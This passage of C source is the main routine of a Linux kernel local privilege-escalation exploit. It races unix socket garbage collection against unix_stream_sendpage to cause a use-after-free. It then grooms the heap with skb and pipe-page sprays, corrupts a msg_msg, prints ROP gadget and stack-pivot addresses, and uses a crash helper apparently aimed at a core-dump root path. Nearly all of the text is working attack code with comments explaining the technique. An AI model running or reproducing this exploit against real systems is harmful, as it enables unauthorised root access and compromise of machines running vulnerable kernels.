// individually; only a sendfile() failure is caught by SYSCHK.
void crash(char *cmd)
{
	int memfd = memfd_create("", 0);
	SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
	dup2(memfd, 666);
	close(memfd);
	while (check_core() == 0)
		sleep(1);
	// intentional invalid write to terminate this process with a fault
	*(size_t *)0 = 0;
}

// Program entry point.
//
// 1. Prints the computed gadget addresses and ignores SIGPIPE.
// 2. Forks two helpers pinned to CPU 1: one that renames itself to "billy" and
//    sleeps forever, and one that runs crash() in a new session.
// 3. Raises RLIMIT_NOFILE, creates the timerfd, runs do_epoll_enqueue() and
//    setup_msg(), and prepares spray_data and the spray pipes.
// 4. Forks a worker that repeats the race round in a loop, calling
//    corrupted_msg() every 0x100 rounds and giving up after 30 minutes.
// 5. Waits for one child to exit and then sleeps forever.
//
// NOTE: the local `struct msghdr msg` below shadows the file-scope `msg`
// buffer for the rest of this function.
int main(int argc, char **argv)
{
	size_t start_time = time(NULL);
	// mode 2 is _IONBF on glibc (unbuffered stdout) — assumes glibc
	setvbuf(stdout, 0, 2, 0);
	//leak();
	printf("POP_RDI @ 0x%lx\n", POP_RDI);
	printf("POP_RDX @ 0x%lx\n", POP_RDX);
	printf("POP_RSI @ 0x%lx\n", POP_RSI);
	printf("POP_RSP @ 0x%lx\n", POP_RSP);
	printf("POP_RSI2 @ 0x%lx\n", POP_RSI2);
	printf("PIVOT @ 0x%lx\n", PIVOT);
	printf("PIVOT2 @ 0x%lx\n", PIVOT2);
	printf("PIVOT3 @ 0x%lx\n", PIVOT3);
	signal(SIGPIPE, SIG_IGN);

	if (fork() == 0)
	{
		set_cpu(1);
		// NOTE(review): writes 6 bytes into argv[0] regardless of its original length
		strcpy(argv[0], "billy");
		while (1)
			sleep(1);
	}
	if (fork() == 0)
	{
		set_cpu(1);
		setsid();
		crash("");
	}

	struct rlimit rlim = {
		.rlim_cur = 0xf000,
		.rlim_max = 0xf000};
	setrlimit(RLIMIT_NOFILE, &rlim);
	// init a timerfd used to extend the race window
	tfd = timerfd_create(CLOCK_MONOTONIC, 0);
	// Attach many epoll waiters to the timerfd to extend the race window
	do_epoll_enqueue(tfd);
	pipe(sync_job);
	setup_msg();
	printf("setup head to 0x%lx\n", PHYS_ADDR_MSG);	
	// Prepare spray data that reallocates the freed skb as pipe page data.
	// Craft skb->head and skb->end to control the skb_shinfo pointer
	for (int i = 0; i < 0x10; i++)
	{
		*(size_t *)&spray_data[i * 0x100 + 0xc0] = PHYS_ADDR_MSG; // skb->head
		*(int *)&spray_data[i * 0x100 + 0xbc] = 0x42;		  // skb->end
	}

	for (int i = 0; i < 0x100; i++)
		SYSCHK(pipe(spray_pipe[i]));

	// prepare a template msg for sending over the unix sockets
	struct msghdr msg = {};
	struct iovec iov[] = {{.iov_base = data, .iov_len = 5}};
	msg.msg_iov = iov;
	msg.msg_iovlen = 1;
	struct cmsghdr *cmsg;
	int len = CMSG_LEN(sizeof(int));
	cmsg = (struct cmsghdr *)calloc(0x10, len); // allocate a large enough chunk (result not checked)
	cmsg->cmsg_len = len;
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	msg.msg_control = cmsg;
	msg.msg_controllen = len;
	set_cpu(1);

	if (fork() == 0)
	{
		while (1)
		{
			// Try a different timerfd expiry (in nanoseconds) on every round,
			// hoping to hit the ideal interleaving within thousands of tries
			if ((timeout & 0xff) == 0)
			{
				printf("0x%lx\n", timeout);
				// Every 0x100 tries, check whether msg_msg->m_list->next was modified by our UAF write
				if (corrupted_msg())
					break;
			}
			// roll back to the smallest timeout so the expiry always stays short.
			if ((timeout & 0xfff) == 0)
			{
				timeout = 200;
				// give up after 30 minutes of wall-clock time
				if( (time(NULL)-start_time)>(30*60) )
					exit(-1);
			}
			timeout++;

			// prepare a pipe used as a signal and make spray_pipe_page_thread read on it
			// When the peer end has been closed by unix_gc, spray_pipe_page_thread wakes up and starts spraying
			pipe(signalpipe);
			pthread_t spray_thread;
			pthread_create(&spray_thread, 0, spray_pipe_page_thread, 0);

			// prepare a data pipe used only for the unix_stream_sendpage call.
			pipe(datapipe);
			write(datapipe[1], data, 0x1000);

			// Prepare unix socket refcount circle
			// A <-> B
			// C <-> D
			SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds));
			A = fds[0];
			B = fds[1];
			SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds));
			C = fds[0];
			D = fds[1];

			// Max out the socket send/recv buffers, because a certain number of skbs must be sprayed
			// for the cross-cache heap attack
			// NOTE(review): val is a size_t but optlen is 4, so only its first four
			// bytes are passed; SYSCHK is also applied twice on each call.
			size_t val = 0x400000;
			SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4)));

			// Spray many skbs ahead of the target for heap feng shui
			*(int *)CMSG_DATA(cmsg) = C;
			for (int i = 0; i < 0x100; i++)
				SYSCHK(sendmsg(D, &msg, 0));

			// Make B's recv buffer hold references to C, datapipe and signalpipe
			cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3);
			msg.msg_controllen = cmsg->cmsg_len;
			((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; // when this file is released, spray_pipe_page_thread wakes up once CPU#1 has free time.
			((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when this file is released, the pipe lock is held by splice, so the release sleeps and lets CPU#1 context switch
			((int *)CMSG_DATA(cmsg))[2] = C;
			SYSCHK(sendmsg(A, &msg, 0));

			// drop the references this process no longer needs
			close(signalpipe[1]);
			close(datapipe[1]);

			// Make C's recv buffer hold a reference to B
			cmsg->cmsg_len = CMSG_LEN(sizeof(int));
			msg.msg_controllen = cmsg->cmsg_len;
			*(int *)CMSG_DATA(cmsg) = B;
			SYSCHK(sendmsg(D, &msg, 0));

			// Spray many skbs after the target for heap feng shui
			*(int *)CMSG_DATA(cmsg) = C;
			for (int i = 0; i < 0x100; i++)
				SYSCHK(sendmsg(D, &msg, 0));

			// drop the references this process no longer needs
			close(B);
			close(C);

			// The actual race round
			pthread_t tid[2];
			pthread_create(&tid[1], NULL, trigger_unix_gc_thread, NULL);
			pthread_create(&tid[0], NULL, trigger_unix_stream_sendpage, NULL);
			pthread_join(tid[1], NULL);
			pthread_join(tid[0], NULL);
			pthread_join(spray_thread, NULL);

			// Drain the spray pipes so their pages are released for the next round
			for (int i = 0; i < 0x100; i++)
				for (int j = 0; j < 0x10; j++)
					read(spray_pipe[i][0], buf, 0x1000);

			// Cleanup for next round
			close(A);
			close(D);
			close(signalpipe[0]);
		}
		exit(0);
	}
	// returns as soon as any one child terminates
	wait(NULL);
	// Never return after success
	while (1)
		sleep(1); 
}
